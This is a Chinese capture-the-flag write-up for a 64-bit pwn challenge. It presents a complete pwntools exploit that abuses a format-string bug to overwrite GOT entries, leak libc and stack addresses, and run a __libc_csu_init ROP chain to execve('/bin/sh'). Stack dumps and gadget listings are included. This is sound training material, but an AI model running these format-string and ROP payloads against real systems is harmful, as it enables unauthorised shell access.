
百度杯 pwn

参考:https://www.anquanke.com/post/id/85785

what_the_fuck

root@kali:~/Desktop/ichunqiu# checksec what_the_fuck
[*] '/root/Desktop/ichunqiu/what_the_fuck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

把name写进去的时候栈的情况如下图:

右图是把 elf.got['__stack_chk_fail'](0x601020)写到栈上,作为后面用 %n/%hn 改写其 GOT 表项时的目标指针备用(Partial RELRO 下 .got.plt 可写,且无 PIE,地址固定)。

这里没有 %p 可用,要泄露地址只能另想办法(后面的脚本用 %s 解引用栈上放好的 read@got 指针来泄露 libc 地址,用 %ld 打印栈上的指针来泄露栈地址)。先看看可用的 gadget:

root@kali:~/Desktop/ichunqiu# ROPgadget --binary what_the_fuck --only "pop|ret"
Gadgets information
============================================================
0x0000000000400a7c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a7e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a80 : pop r14 ; pop r15 ; ret
0x0000000000400a82 : pop r15 ; ret
0x0000000000400a7b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a7f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop rbp ; ret
0x0000000000400a83 : pop rdi ; ret
0x0000000000400a81 : pop rsi ; pop r15 ; ret
0x0000000000400a7d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400699 : ret

Unique gadgets found: 11
# ---- Method 1: lay the fake frames out on the stack ----
# Each msg() below lands in a fresh frame (step 1 of the script repoints
# __stack_chk_fail@got at main, so the stack keeps growing -- see the dump
# that follows).  The qwords are the values the final csu chain will pop.

# gadget1 = 0x400a60, scratch .bss = 0x6010A0.  0x400a60 is not in the pop|ret
# listing above; presumably it is the __libc_csu_init "call [r12+rbx*8]"
# gadget that loads rdx/rsi/edi from r13/r14/r15 -- confirm with objdump -d.

p.recvuntil('input your name: ')
p.sendline('ZoE')
payload = p64(0)+p64(0x6010A0)+p64(0x400a60)
payload += 'A'*0x8
msg(payload)

# ---- read(0, .bss, 0x3b) ----
# 0x3b is deliberate: read() returns the byte count and 0x3b == SYS_execve on
# x86-64, so rax already holds the syscall number when the chain reaches the
# raw syscall.  A short read (e.g. a fragmented send) breaks this.
# In the dump below these land as 0, 1, 0x601040, 0x3b right after a 0x400a7a
# return address: rbx=0, rbp=1, r12=read@got, r13->rdx=0x3b.  0x400a7a is one
# byte before the listed 0x400a7b "pop rbp; ..." gadget, presumably "pop rbx"
# first -- verify in the disassembly.

p.recvuntil('input your name: ')
p.sendline(p64(0x400a60))
payload = p64(0)+p64(1)+p64(elf.got['read'])+p64(0x3B)
msg(payload)

多次修改后的部分栈(前面因为修改地址而抬高的栈不显示出来)

0x7ffcb71cc500:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc510:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc520:	0x00007ffcb71cc550	0x0000000000400981
0x7ffcb71cc530:	0x2439256332373225	0x41414141416e6868
0x7ffcb71cc540:	0x4141414141414141	0x00007ffcb71cc611
0x7ffcb71cc550:	0x00007ffcb71cc580	0x0000000000400a08
0x7ffcb71cc560:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc570:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc580:	0x00007ffcb71cc5b0	0x0000000000400981
0x7ffcb71cc590:	0x2439256330363125	0x41414141416e6868
0x7ffcb71cc5a0:	0x4141414141414141	0x00007ffcb71cc610
0x7ffcb71cc5b0:	0x00007ffcb71cc5e0	0x0000000000400a08
0x7ffcb71cc5c0:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc5d0:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc5e0:	0x00007ffcb71cc610	0x0000000000400a7a
0x7ffcb71cc5f0:	0x0000000000000000	0x0000000000000001
0x7ffcb71cc600:	0x0000000000601040	0x000000000000003b
0x7ffcb71cc610:	0x00000000006010a0	0x0000000000000000
0x7ffcb71cc620:	0x0000000000400a60	0x00007f640e74ca00
0x7ffcb71cc630:	0x0000000000000000	0x7990da5d48aaee00
0x7ffcb71cc640:	0x00000000006010a8	0x0000000000000000
0x7ffcb71cc650:	0x0000000000000000	0x00000000006010a0
0x7ffcb71cc660:	0x0000000000400a60	0x4141414141414141
0x7ffcb71cc670:	0x00007ffcb71cc6a0	0x0000000000400a08
0x7ffcb71cc680:	0x676e6978676e6978	0x00007f640e74ca00
0x7ffcb71cc690:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc6a0:	0x00007ffcb71cc6d0	0x0000000000400981
0x7ffcb71cc6b0:	0x4141414141414141	0x646c243031254141
0x7ffcb71cc6c0:	0x4242424242424343	0x4242424242424242
0x7ffcb71cc6d0:	0x00007ffcb71cc700	0x0000000000400a08
0x7ffcb71cc6e0:	0x000000000a456f5a	0x0000000000000000
0x7ffcb71cc6f0:	0x0000000000000000	0x7990da5d48aaee00
0x7ffcb71cc700:	0x00007ffcb71cc730	0x0000000000400981
0x7ffcb71cc710:	0x3125633533343225	0x392541416e682432
0x7ffcb71cc720:	0x6161616161617324	0x0000000000601040
0x7ffcb71cc730:	0x00007ffcb71cc760	0x0000000000400a08
0x7ffcb71cc740:	0x0000000000601020	0x0000000000400700
0x7ffcb71cc750:	0x00007ffcb71cc840	0x7990da5d48aaee00
0x7ffcb71cc760:	0x0000000000400a20	0x00007f640e6fb2e1
[*] read_addr:0x7f640e7b66b0
[*] read_syscall:0x7f640e7b66be
[*] stack_addr:0x7ffcb71cc700
[*] modify 0x7ffcb71cc610 ==> 0x6010a0
[*] modify 0x7ffcb71cc618 ==> 0x0
[*] modify 0x7ffcb71cc630 ==> 0x0
[*] modify 0x7ffcb71cc5e8 ==> 0x400a7a
[*] modify 0x7ffcb71cc640 ==> 0x6010a8
[*] modify 0x7ffcb71cc648 ==> 0x0

法二

讲解参考:http://www.cnblogs.com/shangye/p/6209008.html 。该博客写得非常详细,我也是按它的步骤来做的,这里不再赘述。

构造完之后的栈结构:

gdb-peda$ x /78xg $rsp
0x7fffc187ad70:	0x2564383835322e25	0x0000006e68243231
0x7fffc187ad80:	0x0000000000000000	0x0000000000000000
0x7fffc187ad90:	0x00007fffc187adc0	0x0000000000400a08
0x7fffc187ada0:	0x0000000000601020	0x00006e6824323100
0x7fffc187adb0:	0x00007fffc187b0b0	0xc9b4afa627fadf00
0x7fffc187adc0:	0x00007fffc187aeb8	0x0000000000400a1c
0x7fffc187add0:	0x00007fffc187adc0	0x00007f60eb488a00
0x7fffc187ade0:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187adf0:	0x00007fffc187ae20	0x0000000000400981
0x7fffc187ae00:	0x31342e256e243925	0x3125643036393639
0x7fffc187ae10:	0x00000000006e2432	0x00007fffc187aee4
0x7fffc187ae20:	0x00007fffc187ae50	0x0000000000400a08
0x7fffc187ae30:	0x00007fffc187aee8	0x00007f60eb488a00
0x7fffc187ae40:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187ae50:	0x00007fffc187ae80	0x0000000000400981
0x7fffc187ae60:	0x0000006e24323125	0x0000000000000000
0x7fffc187ae70:	0x0000000000000000	0x0000000000000000
0x7fffc187ae80:	0x00007fffc187aeb0	0x0000000000400a08
0x7fffc187ae90:	0x00007fffc187aee0	0x00007f60eb488a00
0x7fffc187aea0:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187aeb0:	0x00007fffc187aee0	0x0000000000400981
0x7fffc187aec0:	0x0000000000400a7c	0x0000000000601040
0x7fffc187aed0:	0x0000000000000200	0x00007fffc187aee8
0x7fffc187aee0:	0x0000000000000000	0x0000000000400a60
0x7fffc187aef0:	0x0000000000000000	0x00007f60eb488a00
0x7fffc187af00:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187af10:	0x00007fffc187af40	0x0000000000400981
0x7fffc187af20:	0x4141414141414141	0x646c243031254141
0x7fffc187af30:	0x4242424242424343	0x4242424242424242
0x7fffc187af40:	0x00007fffc187af70	0x0000000000400a08
0x7fffc187af50:	0x000000000a456f5a	0x0000000000000000
0x7fffc187af60:	0x0000000000000000	0xc9b4afa627fadf00
0x7fffc187af70:	0x00007fffc187afa0	0x0000000000400981
0x7fffc187af80:	0x3125633533343225	0x392541416e682432
0x7fffc187af90:	0x6161616161617324	0x0000000000601040
0x7fffc187afa0:	0x00007fffc187afd0	0x0000000000400a08
0x7fffc187afb0:	0x0000000000601020	0x0000000000400700
0x7fffc187afc0:	0x00007fffc187b0b0	0xc9b4afa627fadf00
0x7fffc187afd0:	0x0000000000400a20	0x00007f60eb4372e1

最后发送最终的 ROP 链,再把 "/bin/sh\0" 和 syscall 指令地址读进 0x601b00。注意第二次发送恰好是 0x3b 字节:read 的返回值(读到的字节数)就是 execve 的系统调用号 0x3b,所以必须一次读满,否则 rax 不对:

# Final ROP chain, built around two __libc_csu_init gadgets:
#   0x400a7a -- presumably pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
#               (one byte before the 0x400a7b "pop rbp; pop r12 ..." gadget listed above)
#   0x400a60 -- "gadget1": presumably mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
# Both bodies are inferred from the standard csu layout; confirm with objdump -d.
# Pass 1: read(0, 0x601b00, 0x3b) through read@got (0x601040).
payload=p64(0x0400A7A)
payload+=p64(0x0)           # rbx = 0 -> call [r12 + 0]
payload+=p64(0x1)           # rbp = 1 -> csu loop exits after one call (rbx+1 == rbp)
payload+=p64(0x601040)      # r12 = read@got
payload+=p64(0x3b)          # r13 -> rdx = 0x3b; read() then returns 0x3b == SYS_execve in rax
payload+=p64(0x601b00)      # r14 -> rsi = .bss buffer that receives "/bin/sh\0" + syscall addr
payload+=p64(0x0)           # r15 -> edi = 0 (stdin)
payload+=p64(0x400a60)      # ret -> gadget1
# Pass 2: after the call, csu falls through add rsp,8 and the pop sequence again.
payload+=p64(0x0)           # swallowed by add rsp, 8
payload+=p64(0x0)           # rbx = 0
payload+=p64(0x1)           # rbp = 1
payload+=p64(0x601b08)      # r12 -> [0x601b08] holds the syscall address written in pass 1
payload+=p64(0x0)           # r13 -> rdx = 0 (envp)
payload+=p64(0x0)           # r14 -> rsi = 0 (argv)
payload+=p64(0x601b00)      # r15 -> edi = "/bin/sh"
payload+=p64(0x400a60)      # ret -> gadget1: execve("/bin/sh", 0, 0); rax is still 0x3b from read()

pause()
p.send(payload)

# Exactly 0x3b bytes: 7 + 1 + 8 + 0x2b.  The count matters because read()'s
# return value is reused as the syscall number; a short read breaks the chain.
pause()
p.send('/bin/sh'+'\x00'+p64(syscall)+'\x00'*0x2b)

脚本:

# encoding: utf-8  
from pwn import *
import struct

# Local target; swap in the remote() line for the live service.  The libc
# offset used below (read + 0xe for the syscall instruction) was measured
# against the local libc -- re-check it for the remote one.
elf = ELF('./what_the_fuck')

p = process('./what_the_fuck')
#p = remote('106.75.66.195',10000)

def msg(payload):
    """Wait for the 'leave a msg: ' prompt on the global tube p, then send
    payload raw -- no trailing newline, so the program reads exactly
    len(payload) bytes."""
    prompt = 'leave a msg: '
    p.recvuntil(prompt)
    p.send(payload)

# ---- 1. __stack_chk_fail@got -> main, and leak read@libc ----
# Partial RELRO (checksec above) leaves .got.plt writable and No PIE fixes its
# address, so a %n-style write can repoint a GOT slot.  The name buffer holds
# the target pointer and is reachable as positional arg 12 of the format string.

p.recvuntil('input your name: ')

p.sendline(p64(elf.got['__stack_chk_fail'])) #0x0000000000601020

# __stack_chk_fail@got originally holds 0x4006c6 (author's notes) and main is
# 0x400983: only the low 16 bits differ, so a %hn of 0x983 is enough.  Any
# later call to __stack_chk_fail then lands in main instead of aborting.
# main_addr = 0x400983
# 0x4006c6--> 0x400983

# %<0x983>c%12$hn : store 0x0983 in the low half of [arg12] = __stack_chk_fail@got
# AA%9$s          : dereference [arg9] = read@got appended below -> leaks read@libc
payload = "%"+str(0x983)+'c%12$hn'+'AA%9$s'
payload = payload.ljust(0x18,'a')
payload += p64(elf.got['read']) # arg 9: the pointer %9$s dereferences
# this msg() is what triggers __stack_chk_fail, i.e. the jump back into main
msg(payload)
p.recvuntil('AA')
# NB: shadows the builtin read().  Stops at the first 0x7f byte, which assumes
# the usual 0x00007fxx... libc mapping.
read = u64(p.recvuntil('\x7f').ljust(0x8,"\x00"))
log.info('read_addr:'+hex(read))

# Offset of the `syscall` instruction inside read() -- specific to this libc
# build (measured locally, see the log above).  Re-check with objdump -d on
# the target's libc before running against the real service.
syscall = read+0xe
log.info('read_syscall:'+hex(syscall))
# ---- 2. leak a stack address ----
p.recvuntil('input your name: ')
p.sendline('ZoE')

# %10$ld prints the stack pointer found at arg 10 in decimal; the 'A'*10 and
# 'CC' markers delimit it in the output.
payload = 'A'*10+'%10$ldCC'
payload = payload.ljust(0x20,'B')
msg(payload)
p.recvuntil('A'*10)
stack = int(p.recvuntil('CC',drop=True),10)
log.info('stack_addr:'+hex(stack))

# ---- 3. build the pivot frame on the stack (method 2) ----
# All offsets are relative to the leaked `stack`; they line up with the method-2
# dump above (where stack appears to be 0x7fffc187af70).

# Fake frame: 0x400a7c = pop r12; pop r13; pop r14; pop r15; ret, then
# r12=read@got (0x601040), r13->rdx=0x200, r14->rsi=stack-0x88.  The resulting
# read(0, stack-0x88, 0x200) pulls the final chain onto the stack at the very
# slot execution continues from.
payload=p64(0)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload=p64(0x0400A7C)
payload+=p64(0x601040)
payload+=p64(0x200)
payload+=p64(stack-0x88)
pause()
p.send(payload)


# %12$n with nothing printed before it stores 0 at [arg12] = stack-0x90
# (the r15 slot of that frame -> edi = 0, stdin).
payload=p64(stack-0x90)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%12$n'
payload+='\x00'*(0x20-len(payload))
pause()
p.send(payload)


# %9$n zeroes 4 bytes at [arg9] = stack-0x8c, then 0x400a60 characters are
# printed so %12$n stores 0x400a60 at [arg12] = stack-0x88: the return into
# gadget1 (0x400a60 at 0x...aee8 in the dump).  Expect ~4 MB of output here.
payload=p64(stack-0x88)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%9$n'+'%.'+str(0x400a60)+'d'+'%12$n'
payload+='\x00'*(0x18-len(payload))
payload+=p64(stack-0x8c)
pause()
p.send(payload)


# Patch the saved rbp at stack-0x1b0 so it points at stack-0xb8, the qword
# just below the fake frame; only the low 16 bits are written (%hn), which
# assumes old and new rbp share their upper 48 bits -- true unless the leaked
# region straddles a 64 KiB boundary.
rbp=stack-0xb8
rbp=rbp%0x10000
payload=p64(stack-0x1b0)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%.'+str(rbp)+'d'+'%12$hn'
pause()
p.send(payload)

# ---- 4. __stack_chk_fail@got -> 0x400a1c: stop re-entering main and instead
# return through the patched rbp into the fake frame ----
# 0x400a1c shows up as a return address in the dump; presumably main's
# leave; ret epilogue -- confirm in the disassembly.

payload=p64(0x601020)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%.'+str(0x0a1c)+'d'+'%12$hn'
payload+='\x00'*(0x20-len(payload))
# debug gates: block until Enter (attach gdb here); drop for an unattended run
c2=raw_input("go?")
pause()
p.send(payload)


# ---- 5. final chain, consumed by read(0, stack-0x88, 0x200) ----
# 0x400a7a is presumably pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15;
# ret (one byte before the listed 0x400a7b gadget); 0x400a60 is csu gadget1
# (mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8] -- inferred, verify).
# First call: read(0, 0x601b00, 0x3b) via read@got; rbx=0, rbp=1 make the csu
# loop exit after one iteration.
payload=p64(0x0400A7A)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601040)
payload+=p64(0x3b)
payload+=p64(0x601b00)
payload+=p64(0x0)
payload+=p64(0x400a60)
# Second pass (first qword eaten by add rsp,8): r12=0x601b08 -> the syscall
# address the read stores there, rdx=0, rsi=0, edi=0x601b00 ("/bin/sh").
# rax is still read()'s return value 0x3b == SYS_execve.
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601b08)
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x601b00)
payload+=p64(0x400a60)
raw_input("go?")
pause()
p.send(payload)

# Exactly 0x3b bytes (7 + 1 + 8 + 0x2b); the byte count becomes the syscall
# number, so this must be delivered in a single read().
pause()
p.send('/bin/sh'+'\x00'+p64(syscall)+'\x00'*0x2b)


p.interactive()

借图:
